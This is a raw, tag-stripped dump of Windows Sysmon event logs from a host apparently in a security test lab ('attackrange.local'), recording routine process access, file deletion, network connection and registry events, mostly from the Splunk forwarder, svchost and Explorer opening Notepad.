Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.541{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:10.851{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929BBEB6F3E9B485A0A9554125FDF7CE,SHA256=D1D43993C0D6C8112E39637F8CA12211B81A5AF855EEF19CDD2E5BCB1E841F0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:11.865{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AECC3A0DBD7E5502ECD600E51C7CA804,SHA256=CC34F9AE0117B1706DB6DD8C70B1513DD81C2BD3969F563F6E823CA870F2730E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:12.879{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C2D9DF1F6B9FD1934B68C81A11EECD3,SHA256=81FB841FEACD3CE9C1F322BB9E4EC8B920F23BB5D8C33C76CFBB3EE125927034,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.878{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AAFCDE25F84B93614EF9A90BD52774,SHA256=BB8FB65DC4B517B09A9117DD7101EEC10484877A1D657C0BAE3920A3CCD5C5F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:12.416{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53622-false10.0.1.12-8000- 13241300x80000000000000009054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:13.051{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xf702b956) 23542300x80000000000000009053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.004{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B6B1A164AECB6DE8BF01815915D7762C,SHA256=23D7F0427466D6E6EA1F32E8B83B47B9B4EF4893B2FC79014A2DA76975036EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.004{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3D5A23AD7F61191D5CEF9875E1B833BD,SHA256=2C07051BD8CE0FC80F5AD35F57F1C6673A758ED56DAC2878E77D6EC43A9C4F2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.892{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB07C88B0BF5D92969CEF89E246769B,SHA256=B3AE53D06AC9193A7EDEF3F93D872AB509643CFEA6646ED7AD20A71C88AA338C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.891{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F48D364648F0A50C0DA5B0489DBF3E,SHA256=F4A734E913BDE51A92CF7253FE661A54EB237481E7CEB0A7FD176CB6745E2C42,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.479{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53623-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000009060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.479{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53623-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 
23542300x80000000000000009059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F7E7FBAB430A5EB636F48829EED7D11,SHA256=1717DBDF54C26D82EA9F4EDBC081C2A3A6DB98B4F322AE64C32340618532CCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89D27D7DCB8730B3E533AF4A30927771,SHA256=D72EE45A4E33B542C923B62DE59F868C5EF290A5798C56FBF9BC62C11AEB85F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:16.921{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4A5E661CF1A2EFAF104FA78AD51C52,SHA256=9819C591BC4EB0F234233561D715B2FC3E4B46401B49575BD3EFEE0BB15963F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:17.557{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53624-false10.0.1.12-8000- 23542300x80000000000000009064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:17.998{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC105B4B8AC453CB15ECB3034EAD76E,SHA256=3EA2C0C37C1DE42BB10474F2D57096D0292DF3C2635624C4D43218D0A29AD068,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.137{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.121{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 